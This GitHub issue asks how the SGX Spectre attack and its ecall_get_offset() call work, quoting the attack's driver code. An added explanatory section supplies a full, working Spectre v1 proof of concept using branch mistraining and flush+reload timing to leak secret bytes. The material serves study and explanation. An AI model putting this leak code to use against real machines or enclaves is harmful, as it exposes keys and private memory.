
Working mechanism of sgx spectre attack

Open buttercutter opened this issue 6 years ago • 0 comments

Could anyone explain the working mechanism of the SGX Spectre attack?

How is the ecall_get_offset() caching function actually used in this SGX Spectre exploit?

/* Headers this function depends on. The issue shows only spectre_main(); the header names
 * below are assumed from the standard SGX SDK sample layout (untrusted app side). */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include "sgx_urts.h"   /* sgx_status_t, SGX_SUCCESS, sgx_enclave_id_t */
#include "Enclave_u.h"  /* ecall_get_offset(), generated from the enclave's EDL file */

/* Defined elsewhere in the attack source (not shown in the issue):
 *   global_eid      - enclave id returned by sgx_create_enclave()
 *   array1dupe      - untrusted copy of the enclave's array1; the argv[1] address is made
 *                     relative to it so malicious_x is an index, not an absolute pointer
 *   array2          - the probe array (256 cache lines) timed with flush+reload
 *   readMemoryByte  - runs the mistrain/flush/probe loop for one byte and fills
 *                     value[] (best and second-best guess) and score[] (their hit counts)
 */
int spectre_main(int argc, char **argv) {
	size_t malicious_x;
	/* Ask the enclave for the default target offset (the index of the secret relative
	 * to the enclave's array1); the ECALL fails if the enclave is not loaded. */
	sgx_status_t ret = ecall_get_offset(global_eid, &malicious_x);
	if (ret != SGX_SUCCESS)
		abort();

	int i, score[2], len = 40;
	uint8_t value[2];

	for (i = 0; i < sizeof(array2); i++)
		array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */

	if (argc == 3) {
		sscanf(argv[1], "%p", (void **)(&malicious_x));
		malicious_x -= (size_t)array1dupe; /* Convert input value into an offset from array1dupe */
		sscanf(argv[2], "%d", &len);
	}

	printf("Reading %d bytes:\n", len);

	while (--len >= 0) {
		printf("Reading at malicious_x = %p... ", (void *)malicious_x);
		readMemoryByte(malicious_x++, value, score);
		/* A byte counts as read when the best guess beats the runner-up by 2:1. */
		printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
		printf("0x%02X='%c' score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
		if (score[1] > 0)
			printf("(second best: 0x%02X score=%d)", value[1], score[1]);
		printf("\n");
	}

	return (0);
}

buttercutter avatar Apr 16 '20 16:04 buttercutter
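What the posted loop relies on, shown as an added example that is not part of this issue or of the spectre-attack-sgx repository: spectre_main() above follows the original Spectre v1 proof of concept, in which readMemoryByte() leaks array1[malicious_x] by mistraining the bounds check in a victim function, flushing array2, triggering the speculative out-of-bounds load, and then timing each array2 line with flush+reload. In the SGX variant the victim function lives inside the enclave and ecall_get_offset() supplies the starting index; neither is shown on this page, so here a plain userspace victim_function() and a constructed secret stand in for them (an assumption, not the repository's enclave code). The scoring rule (best guess must beat the runner-up 2:1), the offset arithmetic relative to array1 and the shuffled probe order are the same as in the posted code. Only pick_best_two() and is_clear_read() are deterministic; the leak itself appears only on an unmitigated x86 CPU with CACHE_HIT_THRESHOLD tuned for the machine.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>   /* _mm_clflush, __rdtscp */
#define HAVE_X86_TIMING 1
#else
#define HAVE_X86_TIMING 0
#endif

#define CACHE_HIT_THRESHOLD 80 /* cycles; assumed value, tune per machine */

/* Constructed victim state; stands in for the enclave-resident array1 and secret. */
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
uint8_t unused2[64];
uint8_t array2[256 * 512];          /* one probe line per possible byte value */
const char *secret = "The Magic Words are Squeamish Ossifrage."; /* constructed secret */
uint8_t temp = 0;                   /* keeps the compiler from dropping the load */

/* Spectre v1 gadget: the bounds check is correct, but a mistrained predictor runs the
 * load for an out-of-bounds x speculatively and leaves array2[array1[x]*512] cached. */
void victim_function(size_t x) {
    if (x < array1_size)
        temp &= array2[array1[x] * 512];
}

/* Turn per-value hit counts into the best and second-best guess (value[]/score[]). */
void pick_best_two(const int results[256], uint8_t value[2], int score[2]) {
    int i, j = -1, k = -1;
    for (i = 0; i < 256; i++) {
        if (j < 0 || results[i] >= results[j]) { k = j; j = i; }
        else if (k < 0 || results[i] >= results[k]) { k = i; }
    }
    value[0] = (uint8_t)j;
    score[0] = results[j];
    value[1] = (uint8_t)(k < 0 ? 0 : k);
    score[1] = (k < 0 ? 0 : results[k]);
}

/* Same acceptance rule as spectre_main(): best must beat runner-up at least 2:1. */
int is_clear_read(const int score[2]) {
    return score[0] >= 2 * score[1];
}

/* Leak array1[malicious_x]: mistrain with in-bounds indices, flush, hit once with the
 * malicious index, then time every array2 line; a fast line reveals the byte. */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
    int results[256] = {0};
#if HAVE_X86_TIMING
    unsigned int junk = 0;
    int tries, i, j, mix_i;
    size_t training_x, x;
    uint64_t time1, time2;
    volatile uint8_t *addr;

    for (tries = 999; tries > 0; tries--) {
        for (i = 0; i < 256; i++)
            _mm_clflush(&array2[i * 512]);          /* evict every probe line */
        training_x = tries % array1_size;
        for (j = 29; j >= 0; j--) {
            _mm_clflush(&array1_size);              /* slow the bounds check itself */
            for (volatile int z = 0; z < 100; z++) {} /* let the flush complete */
            /* Branch-free select: x = training_x on 5 of 6 calls, malicious_x on the 6th */
            x = ((j % 6) - 1) & ~0xFFFF;
            x = (x | (x >> 16));
            x = training_x ^ (x & (malicious_x ^ training_x));
            victim_function(x);
        }
        for (i = 0; i < 256; i++) {
            mix_i = ((i * 167) + 13) & 255;         /* shuffle order vs. the stride prefetcher */
            addr = &array2[mix_i * 512];
            time1 = __rdtscp(&junk);
            junk = *addr;
            time2 = __rdtscp(&junk) - time1;
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                results[mix_i]++;                   /* cache hit not caused by training */
        }
    }
#else
    (void)malicious_x; /* no timing source on this target: every count stays zero */
#endif
    pick_best_two(results, value, score);
}

int main(void) {
    /* Index of the secret relative to array1, as spectre_main() does with array1dupe. */
    size_t malicious_x = (size_t)secret - (size_t)array1;
    int len = 10, i, score[2];
    uint8_t value[2];
    for (i = 0; i < (int)sizeof(array2); i++)
        array2[i] = 1; /* force real pages, not copy-on-write zero pages */
    while (--len >= 0) {
        readMemoryByte(malicious_x++, value, score);
        printf("%s: 0x%02X='%c' score=%d (second best 0x%02X score=%d)\n",
               is_clear_read(score) ? "Success" : "Unclear", value[0],
               (value[0] > 31 && value[0] < 127) ? value[0] : '?', score[0], value[1], score[1]);
    }
    return 0;
}
```

On a mitigated or non-x86 host every score stays 0 and each line reads "Success" only because 0 >= 0; that is the weakness of the 2:1 rule the posted code shares with the original PoC, and in practice one also requires score[0] to exceed a small absolute minimum before trusting a byte.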